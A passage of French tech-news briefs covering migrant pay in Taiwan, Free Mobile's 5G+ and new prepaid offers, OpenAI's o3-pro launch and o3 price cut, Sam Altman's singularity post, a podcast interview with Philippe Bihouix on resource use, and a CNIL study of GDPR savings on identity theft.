Les salaires perçus par les travailleurs philippins se rapprochent du salaire minimum local (29 000 nouveaux dollars taïwanais, soit 846 euros par mois), quand ceux des employés taïwanais commencent plus haut et peuvent s’accompagner de bonus, d’augmentations ou d’autres avantages.

Auprès de Rest of World, des sociétés comme ASE Technology Holding ou Super Micro Computer déclarent traiter les employés locaux et immigrés de la même manière, et soulignent que 95 % renouvellent leur contrat lorsque celui-ci expire. TSMC n’a pas commenté.

Quelques jours après Orange, Free Mobile annonce lui aussi que la 5G StandAlone – ou 5G+ dans le langage commercial des opérateurs – est disponible sur les iPhone. « Depuis le 6 juin », précise Free Mobile, soit exactement au même moment qu’Orange.

Les conditions sont exactement les mêmes : disposer d’un iPhone 15 ou 16 (toutes déclinaisons, y compris 16e). Ils viennent s’ajouter aux dizaines de smartphones Android déjà compatibles : Samsung Galaxy Z Flip 6, Galaxy S25 et S24, A56 5G, A36 et 26 5G, Xiaomi 15, Honor Magic 7 Pro, Google Pixel 9… Free revendique « plus de 100 modèles de smartphones compatibles 5G+ ». La liste complète est disponible ici.

Il faut aussi avoir un forfait Free 5G et être dans une zone couverte par là 5G à 3,5 GHz, Pour activer la 5G+, il faut en plus « installer la dernière version logicielle disponible » (ce qui explique la concomitance des déploiements chez Orange et Free), « activer l’option 5G+ dans son Espace Abonné (rubrique « Mes options ») » et redémarrer le téléphone (ou activer puis désactiver le mode avion).

Free Mobile met en avant les mêmes avantages qu’Orange : « des débits plus élevés, une latence réduite, une meilleure sécurité du réseau et des services avancés comme la VoNR », ou Voice over New Radio. Alors que la 5G de base (Non StandAlone ou NSA) passe par un cœur de réseau 4G, la 5G+ « repose sur une infrastructure 100 % 5G ».

Paix et félicité

Soirée chargée hier pour OpenAI, avec plusieurs annonces importantes sur ses modèles. La principale était la disponibilité d’o3 Pro, son nouveau modèle de raisonnement. Les tarifs du modèle o3 ont en parallèle été sérieusement rabotés. Et alors que Sam Altman redit tout le bien qu’il pense de l’IA générative, l’entreprise se serait rapprochée de Google pour diversifier ses ressources cloud.

Alors que Mistral vient de lancer ses deux premiers modèles de raisonnement Magistral, OpenAI a dégainé le même jour un nouveau concurrent. Nommé o3-pro, il s’agit d’une version survitaminée du premier modèle o3.

Sans surprise, cette version Pro fait mieux que tous les modèles lancés par l’entreprise jusqu’ici. Dans les résultats fournis par OpenAI, on le voit ainsi dépasser – parfois très largement – les performances d’o1 Pro. En conséquence, o3-pro va remplacer l’ancien modèle dans ChatGPT, puisqu’il donne de meilleurs résultats dans tous les cas de figure, vante l’entreprise.

o3-pro prend la place d’o1-pro

C’est particulièrement vrai dans des domaines comme les sciences, l’éducation, la programmation, la finance et l’aide à la rédaction. Selon des tests menés sur un groupe de personnes en interne, il ferait également mieux en matière de clarté, d’exhaustivité, de suivi des instructions et d’exactitude. En bref, le type d’amélioration que l’on est en droit d’attendre d’une nouvelle version d’un modèle de raisonnement.

o3-pro dispose également d’un autre avantage important par rapport à son prédécesseur : il est compatible avec les outils de ChatGPT. « Il peut faire des recherches sur le Web, analyser des fichiers, raisonner sur des entrées visuelles, utiliser Python, personnaliser des réponses en utilisant la mémoire, et plus encore », explique OpenAI.

• Les modèles dits « de raisonnement » s’effondrent quand il faut raisonner sérieusement

Conséquence, si les réponses sont plus précises et peuvent s’appliquer à davantage de situations, elles prennent aussi plus de temps. L’entreprise recommande d’utiliser o3-pro dans les cas où la fiabilité devient plus importante que la rapidité « et où quelques minutes d’attente valent la peine ». Une curieuse recommandation, faisant peser des doutes sur la fiabilité des réponses plus rapides.

Il existe également plusieurs limitations. D’une part, un problème technique empêche pour l’instant o3-pro de prendre en charge les chats temporaires. D’autre part, la génération d’images ne fait pas partie des attributions du nouveau modèle. Pour cette dernière, il faut se tourner vers GPT-4o, o3 ou o4-mini. Enfin, Canvas n’est pas non plus supporté.

o3-pro dispose d’une fenêtre contextuelle de 200 000 jetons. Ses tarifs sont de 20 dollars par million de jetons en entrée et 80 dollars en sortie. Le modèle est donc assez onéreux. Son utilisation ne peut pour l’instant se faire que via les abonnements ChatGPT Pro et Team. Les formules Enterprise et Edu l’auront la semaine prochaine.

OpenAI casse les prix d’o3

Puisque l’on parle de tarification, signalons un important changement pour o3 dans sa version classique. Lancé en avril et présentant alors les meilleurs résultats de tous les modèles d’OpenAI, son utilisation est restée limitée.

La faute à des tarifs élevés pour ce type de modèle dans la catégorie « medium » : 10 dollars en entrée et 40 dollars en sortie. o3 s’est très vite retrouvé en compétition avec d’autres modèles, et la comparaison n’était guère flatteuse. Chez Google, Gemini 2.5 Pro faisait par exemple presque jeu égale dans les capacités, tout en étant beaucoup moins cher (1,25 et 10 dollars respectivement). Claude Sonnet 3.7, lui, était dans la même fourchette tarifaire, mais faisait mieux.

OpenAI a donc annoncé hier soir une baisse de 80 % dans les deux sens. Les nouveaux tarifs sont ainsi de 2 dollars par million de jetons en entrée et 8 dollars par million de jetons en sortie.

Rapprochement avec Google

Si l’on en croit Reuters, OpenAI s’est également beaucoup rapprochée de Google ces derniers mois. Les deux entreprises seraient en discussions depuis longtemps, dans l’optique d’augmenter les capacités de calcul dont OpenAI a tant besoin.

Selon nos confrères, un accord aurait été trouvé en mai, bien qu’aucune des deux entreprises n’ait encore fait d’annonce à ce sujet. La question de l’accord avec Microsoft n’aurait pas été un problème, OpenAI ayant un partenariat révisé depuis les prémices du projet Stargate. Ce dernier, qui pourrait se voir doter d’un projet de 500 milliards de dollars, prévoit en effet qu’OpenAI sera au centre d’une immense infrastructure, à laquelle Microsoft ne participe pas.

Reuters, sûr de ses sources, affirme que cet accord a quelque peu surpris nombre d’observateurs. ChatGPT a été considéré comme le plus grand coup de pioche dans les activités historiques de Google depuis la création du moteur de recherche. En outre, si le partenariat peut être vu comme une grande victoire pour Google Cloud – toujours loin derrière AWS et Azure – c’est en revanche une autre affaire pour la division IA du géant.

Selon plusieurs sources, l’accord était en projet depuis un bon moment. OpenAI chercherait activement à réduire sa dépendance à Microsoft. Le père de ChatGPT se serait particulièrement intéressé à la puce TPU de Google, quand bien même il développe actuellement sa propre puce. Ce type de développement est d’ailleurs en plein essor, y compris chez Microsoft, pour réduire une dépendance vive à NVIDIA.

Pendant ce temps, chez Sam Altman

Le CEO d’OpenAI a publié cette nuit un billet dans lequel il le redit : la singularité n’est plus loin. Il parle d’ailleurs de « singularité douce ». En somme, la « superintelligence numérique » est toujours à l’horizon, mais la transition vers ce miracle technologique va se faire progressivement.

Pour Altman, c’est une question quasi mathématique. Selon lui, de nombreux scientifiques témoigneraient déjà de gains conséquents de productivité. Grâce à l’IA, des produits plus puissants seraient créés, permettant à leur tour des avancées scientifiques, qui à leur tour permettent une évolution des outils. Un cercle vertueux qui ne pourrait aboutir qu’à une amélioration générale de la qualité de vie.

Altman donne également quelques informations sur la consommation moyenne d’une requête à ChatGPT. Selon le CEO, elle serait de 0,34 Wh pour l’électricité et d’un « quinzième de cuillère à café » d’eau. « Au fur et à mesure que la production des centres de données s’automatise, le coût de l’intelligence devrait finir par se rapprocher du coût de l’électricité », affirme-t-il.

« Le rythme auquel de nouvelles merveilles seront réalisées sera immense. Il est difficile d’imaginer aujourd’hui ce que nous aurons découvert en 2035 ; nous passerons peut-être de la résolution des problèmes de physique des hautes énergies une année au début de la colonisation de l’espace l’année suivante ; ou d’une percée majeure dans la science des matériaux une année à de véritables interfaces cerveau-ordinateur à large bande passante l’année suivante ».

Il évoque quand même deux problèmes loin d’être résolus. D’abord l’alignement, c’est-à-dire l’assurance que l’IA va dans le même sens « ce que nous voulons vraiment collectivement à long terme ». Il cite en exemple les algorithmes des médias sociaux, selon un cas classique d’IA mal alignée puisqu’elle troque le long terme pour une préférence à court terme. Ensuite, il faudra rendre cette superintelligence « bon marché, largement disponible et pas trop concentrée sur une personne, une entreprise ou un pays ».

En 2025, alors que Bouygues Telecom va mettre fin à toutes ses offres prépayées, Free Mobile décide de se lancer dans l’aventure avec des recharges de 5 à 50 euros (valables jusqu’à 90 jours) et des « Pass ».

Comme l’a repéré le fin limier Tiino-X83 sur X, Free Mobile a mis en ligne un site avec de nouvelles offres : des cartes prépayées. Ce matin, le site permettait de créer un compte et se connecter, mais cette procédure est « cassée » maintenant et nous n’arrivons plus à nous connecter à notre compte. iliad n’a pas encore communiqué officiellement sur ses cartes prépayées, les choses peuvent donc évoluer.

Contrairement au forfait où l’on paye tous les mois pour une offre précise avec parfois du « hors forfait », les cartes prépayées permettent d’acheter « des crédits » à utiliser selon vos besoins. Il existe aussi des « pass », sorte de formules tout en un avec appels, SMS/MMS et data à utiliser dans un délai contraint, sans possibilité de dépassement.

C’est un marché en dents de scie, comme le rappelait récemment l’Arcep, il y a quelques semaines. Au premier trimestre 2025, le prépayé progressait de 20 000 cartes « après une baisse de 220 000 cartes au premier trimestre 2024 ». Sur un an, la croissance est inférieure à 1 % depuis le quatrième trimestre 2023.

Free semble, quoi qu’il en soit, décidé à se lancer… en espérant que cela ne fasse pas comme avec la 2G : un petit tour et s’en va. L’opérateur avait pour rappel activé ses premières antennes en 2022, avant de plier boutiques quelques mois plus tard, après une prolongation de l’itinérance sur le réseau 2G et 3G d’Orange.

• Cinq mois après avoir mis en service sa 2G, Free Mobile coupe l’ensemble de ses sites

Des recharges de 5 à 50 euros, valables de 30 à 90 jours

Dans les grandes lignes, les cartes vont de 5 à 50 euros, avec des durées de validité de 30 à 90 jours. Il faut évidemment acheter une carte SIM pour en profiter, elle est facturée 5 euros.

Vous payez ensuite à la consommation : 5 centimes la minute de communication, le SMS ou le MMS « depuis la France métropolitaine, DOM et Europe vers la France métropolitaine ». Toujours depuis la France métropolitaine, les DOM et l’Europe, le Mo est facturé 5 centimes., soit 50 euros le Go.

Une fois la durée de validité dépassée, « le service est résilié automatiquement dans un délai de 30 jours […] entraînant la désactivation de la carte SIM Free prépayé et la perte du numéro », précise Free.

« En cas de demande de portabilité sortante l’utilisateur pourra, sur demande, obtenir le remboursement des crédits restant sur son compte prépayé au jour de la date de portage », précise l’opérateur.

Des Pass Internationaux (Maroc, Tunisie, Cameroun, Madagascar, Mali)

Free propose aussi des Pass nationaux et internationaux, tous avec une durée de validité de 30 jours maximum (certains sont à 15 jours), des SMS, MMS et appels illimité en France. La différence se fait donc sur les appels internationaux et la quantité de data incluse.

Le Pass Free M à 9,99 euros propose ainsi « 100 minutes vers les mobiles États-Unis, Canada, Alaska, Hawaï, Chine et DOM et fixes de 100 destinations », 200 Go de data en 4G/5G, dont 10 Go en Europe et DOM.

Les Pass internationaux ont plusieurs déclinaisons en fonction des pays vers lesquels les communications sont incluses : Maroc, Tunisie, Cameroun, Madagascar et le Mali. À chaque fois, il est précisé que c’est « sur les mobiles de l’opérateur Orange » dans le pays concerné.

La brochure tarifaire détaille le prix des communications vers l’international.

Pas d’eSIM, pas de migration depuis/vers les forfaits

Free Mobile ne parle pas d’eSIM dans sa brochure tarifaire, mais indique qu’il est possible d’activer un renouvellement automatique des Pass prépayés depuis le compte utilisateur. Le renouvellement peut être payé via le crédit restant sur la carte prépayé ou via une carte bancaire.

L’opérateur précise enfin que « les forfaits mobiles Free et les offres Free Prépayé sont distincts. Si vous souhaitez profiter d’une offre prépayée vous devez commander une carte SIM Free Prépayé ». Pas de migration donc entre les forfaits et le prépayé.

Bouygues Telecom s’en va, Orange et SFR restent en place

Free est le dernier arrivé sur le marché du prépayé, qui compte déjà bon nombre d’acteurs. Les trois autres opérateurs nationaux sont présents : Orange avec ses Mobicartes de 2,99 à 19,99 euros , SFR avec des « cartes » de 4,99 à 19,99 euros et Bouygues Telecom… mais les offres vont disparaitre dans quelques jours, le 30 juin de cette année.

À chacun de comparer en fonction de ses besoins. Le Pass Free S à 5 euros propose des appels, SMS/MMS illimité et 5 Go de 5G en France, en Europe et dans les DOM. À ce jeu, SFR fait mieux avec 10 Go pour le même prix.

Si on passe à 15 euros par contre, la donne est différente. 300 Go en 5G (17 Go en Europe et DOM) pour le Pass Free L, avec des appels illimités vers les mobiles États-Unis, Canada, Alaska, Hawaï, Chine et DOM, ainsi que les fixes de 100. destinations

Chez SFR, la carte prépayée à 15 euros ne propose que 80 Go (32 Go par contre depuis l’Europe et les DOM). Orange est à 150 Go (dont 25 Go en Europe) pour 17 euros, avec « 2 h d’appels vers Europe, Royaume-Uni, USA/Canada + 30 min d’appels vers les mobiles Orange Afrique ». Ces trois offres ont une durée de validité d’un mois.

Des opérateurs virtuels proposent aussi des cartes prépayées. C’est notamment le cas de La Poste Mobile, tandis que d’autres comme Lebara et Lycamobile proposent des « forfaits prépayés » avec une validité de… 30 jours.

Ressources non renouvelables

Dans le deuxième épisode d’Écosystème, Philippe Bihouix revient sur les enjeux que pose le recours permanent à de nouvelles technologies en termes de ressources.

En 2014, l’ingénieur Philippe Bihouix publie L’Âge des Low Tech (Seuil), un ouvrage dans lequel il alerte sur la facilité avec laquelle la société tend à proposer des solutions techniques à chaque problématique environnementale. « L’alerte consistait à dire que cette solution high tech consomment toujours plus de ressources, souvent des ressources plus rares, et que cette mécanique nous éloigne du recyclage » et des logiques d’économie circulaire, explique-t-il à Next.

Dix ans plus tard, la question des ressources est devenue plus visible dans l’espace public. La promotion des mobilités électriques y a participé, de même que les débats économiques et géopolitiques sur l’accès aux terres rares et aux matériaux déclarés critiques et stratégiques par l’Union européenne.

Dans le deuxième épisode du podcast Écosystème, disponible ici ou sur votre plateforme d’écoute habituelle, Philippe Bihouix revient sur les enjeux que pose le numérique en termes de ressources.

• [Écosystème 2/7] La Terre derrière la tech

Techno discernement

Dans le premier épisode d’Écosystème, le fondateur de GreenIT Frédéric Bordage qualifiait le recyclage d’objets numériques de « vue de l’esprit ». En 2022, l’Institut des Nations Unies pour la formation et la recherche (Unitar) relevait en effet qu’à peine un cinquième des déchets électroniques avaient été correctement recyclés, et que leur volume augmentait cinq fois plus rapidement que celui de leur collecte et de leur recyclage.

C’est avec ces considérations en tête que Philippe Bihouix argumente à longueur d’ouvrages en faveur de la sobriété. Ainsi, dans la bande dessinée Ressources (avec Vincent Perriot, Casterman, 2024), le voit-on lancer : « Chaque fois que nous produisons un smartphone, nous le faisons au prix d’une baisse d’équipement de dentiste de l’an 2200 ! »

L’idée est de « s’intéresser à cette question des ressources non renouvelables », indique-t-il à Next. Les métaux contenus dans un smartphone le sont en quantité tellement infime, « qu’il est techniquement inenvisageable de les recycler. De fait, ces ressources utilisées dans nos smartphones deviendront indisponibles pour le futur. »

Pour l’ingénieur, pointer ces enjeux permet d’ouvrir la question du « discernement technologique ». Dans La ruée minière au XXIe siècle (Seuil, 2024), la journaliste Célia Izoard détaille en effet combien l’extraction de ressources se fait au prix d’impacts sur la biodiversité, sur la consommation d’eau, de génération de déchets toxiques, etc, tandis que Philippe Bihouix rappelle que le reste de la chaîne de valeur est lui aussi énergivore et source de multiples impacts environnementaux.

« Prenons l’exemple de l’intelligence artificielle. Bien sûr, il y a différents modèles, mais on voit bien les centaines de centres de données en construction, on voit qu’ils ont des échelles hyperscales » – le terme est employé pour qualifier des centres de données de très grande ampleur, généralement déployés par des fournisseurs de services cloud. On voit que ces centres sont des « monstres qui consomment l’équivalent de villes de dizaines de milliers d’habitants », continue Philippe Bihouix. « Là, l’approche du discernement technologique permettrait de demander : à quoi peut bien servir cette IA ? Si c’est pour faire des images de nounours sympathique ou les menus de la semaine, ça paraît anecdotique. »

S’il faudrait débattre pour estimer quels usages sont les plus utiles et lesquels les plus futiles, l’ingénieur appelle à considérer « qu’aujourd’hui, ces technologies provoquent un gaspillage assez incroyable de ressources »… et que ces usages sont autant « d’opportunités que n’auront pas les générations futures ».

Adaptations systémiques

En 2014, déjà, Philippe Bihouix soulignait qu’il existait de nombreuses adaptations possibles pour faire face à l’usage croissant de ressources et se rapprocher d’une économie plus circulaire. « Plutôt que des solutions techniques, il s’agit en fait de solutions culturelles, organisationnelles, sociales, sociétales. »

Une décennie plus tard, l’ingénieur revient sur une dynamique en demi-teinte. L’intérêt pour « des solutions sobres et résilientes » s’est éveillé, le mot et l’idée de low tech s’installent, « dans des programmes de recherche, dans les écoles d’ingénieurs, d’architectes ».

En parallèle, cela dit, « le gros de l’intérêt public reste focalisé sur une logique de business as usual ». Évoquant les smart grids ou l’intelligence artificielle, Philippe Bihouix évoque « l’idée selon laquelle il faudrait mettre des millions, voire des milliards d’euros dans tel ou tel domaine… cette obsession selon laquelle il faudrait courir aussi vite que les autres, au risque de se faire distancer ».

À l’heure où 89 % de la population mondiale voudrait plus d’action politique pour lutter contre les bouleversements environnementaux, l’ingénieur s’étonne du maintien de ces logiques « qui obligent à courir deux fois plus vite pour faire du surplace ».

Et de souligner que deux crises récentes, celle du Covid-19 puis la guerre en Ukraine, ont montré que « des évolutions de normes sociales, culturelles ou de pratiques pouvaient aller très rapidement ». En faisant pression sur l’approvisionnement en énergie, le conflit ouvert par la Russie a permis de montrer que la notion même de sobriété devenait plus largement acceptable.

« L’inconvénient est que cette notion reste manœuvrée par la puissance publique en termes de sobriété individuelle : il faudrait moins chauffer, prendre le vélo, covoiturer… alors qu’une sobriété beaucoup plus systémiques pourrait être adoptée par les organisations », via des incitations fiscales ou réglementaires.

La souveraineté par la sobriété ?

Pour Philippe Bihouix, cette recherche de sobriété numérique, voire de capacité à « fonctionner en mode hybride ou dégradé », comme a pu y obliger la pandémie, est intéressante à plusieurs titres. Le cas de cyberattaques contre les hôpitaux l’illustre bien : non seulement le tout-numérique soulève des enjeux environnementaux, mais il en pose d’autres en termes de (cyber)sécurité comme de continuité du service fourni.

L’ingénieur appelle donc à « des évolutions de compétences économiques et d’expertises », qui permettraient de faire durer les outils déjà déployés, et de favoriser l’adaptabilité des processus qui fonctionnent grâce aux infrastructures numériques. Ces nouvelles stratégies d’organisations nécessiteraient, avant tout, d’améliorer la réparabilité et la maintenance des objets technologiques qui font désormais partie de nos quotidiens, « jusqu’au niveau des composants ».

« À court terme, imaginer numériser nos villes et l’ensemble des services essentiels, cela veut dire créer des dépendances à une cinquantaine de pays différents, que ce soit pour les ressources extraites, les lieux où sont stockées les données, etc. »

À l’inverse, adopter des modes de réflexion axés sur « l’usage et la maintenance du stock existant » – que l’on parle du stock de ressources, ou, dans les strates supérieures, des équipements déjà disponibles – n’est pas uniquement un sujet utile aux générations futures, insiste Philippe Bihouix. Au contraire, en favorisant l’adaptation, il permet aussi d’œuvrer à des formes de souveraineté, voir « de résilience ».

Pour en savoir plus, écoutez l’entretien complet.

Selon une évaluation de la CNIL, la transparence imposée par le RGPD aurait permis d’éviter des coûts situés dans une fourchette de 90 et 219 millions d’euros en France.

La CNIL veut montrer que le RGPD n’est pas qu’une question de principes. L’autorité française de protection des données a publié ce mois-ci une analyse économique des conséquences bénéfiques du RGPD sur les finances des entreprises françaises concernant la cybersécurité. « Le RGPD incite les entreprises à investir davantage dans la cybersécurité, afin de limiter l’impact du cybercrime à l’échelle de la société et présente donc un bénéfice pour l’ensemble des acteurs », affirme l’autorité dans la conclusion de son étude [PDF].

La CNIL déplorait l’année dernière que la plupart des études d’impact à propos du RGPD « se concentrent sur les coûts sans suffisamment mesurer les bénéfices pour les entreprises et les gains de bien-être pour les personnes ». Elle a donc entrepris elle-même de mesurer certains bénéfices du règlement européen, six ans après sa mise en application, et notamment ceux concernant les préjudices liés à la cybersécurité.

Estimation du gain sur les usurpations d’identité

L’étude de l’autorité se limite aux usurpations d’identité « car il s’agit du délit en cybercriminalité dont le coût est le mieux documenté ». Elle rappelle pour autant qu’ « il faut garder en tête que ce n’est qu’une seule forme de cybercrime ». Elle ajoute même que « les gains reflétés par le RGPD dans cette partie ne sont vraisemblablement qu’une faible partie des gains totaux en matière de prévention du cybercrime puisqu’il est difficile de documenter, en raison du manque de données, ceux liés aux autres formes de cybercrime (comme les rançongiciels par exemple) ».

S’appuyant sur une étude scientifique parue en 2018, l’autorité explique qu’une entreprise aurait intérêt, pour elle-même, à ne pas révéler les failles de sécurité de grande ampleur, « les inconvénients d’une transparence étant supérieurs aux avantages, au regard du nombre de personnes potentiellement exposées ». « Pour ces entreprises, la stratégie optimale serait alors de dévoiler une cyberattaque peu importante, mais de ne pas révéler une fuite de données conséquente », ajoute-t-elle. Les clients subiraient les conséquences sans pouvoir réagir.

Avec l’obligation de transparence imposée par l’article 34 du RGPD, les entreprises sont poussées à éviter les fuites. C’est ce gain que l’autorité a mesuré. L’autorité explique que « l’impact de ce type de politique sur l’usurpation d’identité a été étudié à deux reprises par la littérature économique. Romanosky (2011) trouve [PDF] une baisse de 6,1 % du nombre d’usurpations d’identité et Bisogni (2020) trouve une baisse de 2,5 % suite à la mise en œuvre d’une politique de communication de violation de données ».

Entre 54 et 132 millions d’euros de coûts évités en France

En s’appuyant sur ces travaux et des estimations sur le coût du cybercrime, l’étude de la CNIL calcule une fourchette des coûts directs des usurpations d’identité évitées par la notification de violation de données, mais aussi des coûts indirects.

Selon la CNIL, la France aurait évité entre 54 et 132 millions d’euros de coûts directs liés aux usurpations d’identités. En Europe, cette fourchette serait de 405 à 988 millions d’euros de coûts évités.

Concernant les coûts indirects, l’autorité reste prudente : « comme il semble possible de l’imaginer, si le coût direct d’un cybercrime est complexe à estimer, ses coûts indirects le sont d’autant plus ». L’étude explique que ces coûts sont entre autres dus à la perte de confiance des individus quant à la sécurité des données personnelles. La CNIL cite en exemple une étude publiée en 2017 qui estime qu’en Belgique, « 5,9 % et 10,4 % de la population ont respectivement limité leurs usages des banques en ligne et de e-commerce en raison des risques de cybersécurité ». En s’appuyant sur des modélisations, l’autorité a estimé ce coût indirect.

C’est en additionnant les coûts directs et indirects estimés que l’autorité arrive à une fourchette de 90 à 219 millions d’euros d’économies grâce au RGPD en France concernant l’usurpation d’identité. En Europe, cette fourchette situe ce coût entre 585 millions et 1,4 milliard d’euros :

L’autorité explique que « c’est un premier chiffre qui vise principalement à illustrer les potentiels gains du RGPD plutôt qu’à en rendre compte dans leur intégralité ». Elle ajoute qu’ « en effet, en raison des limites dans les données disponibles, il est difficile de fournir une estimation rigoureuse des autres gains liés à la cybersécurité permis par le RGPD ».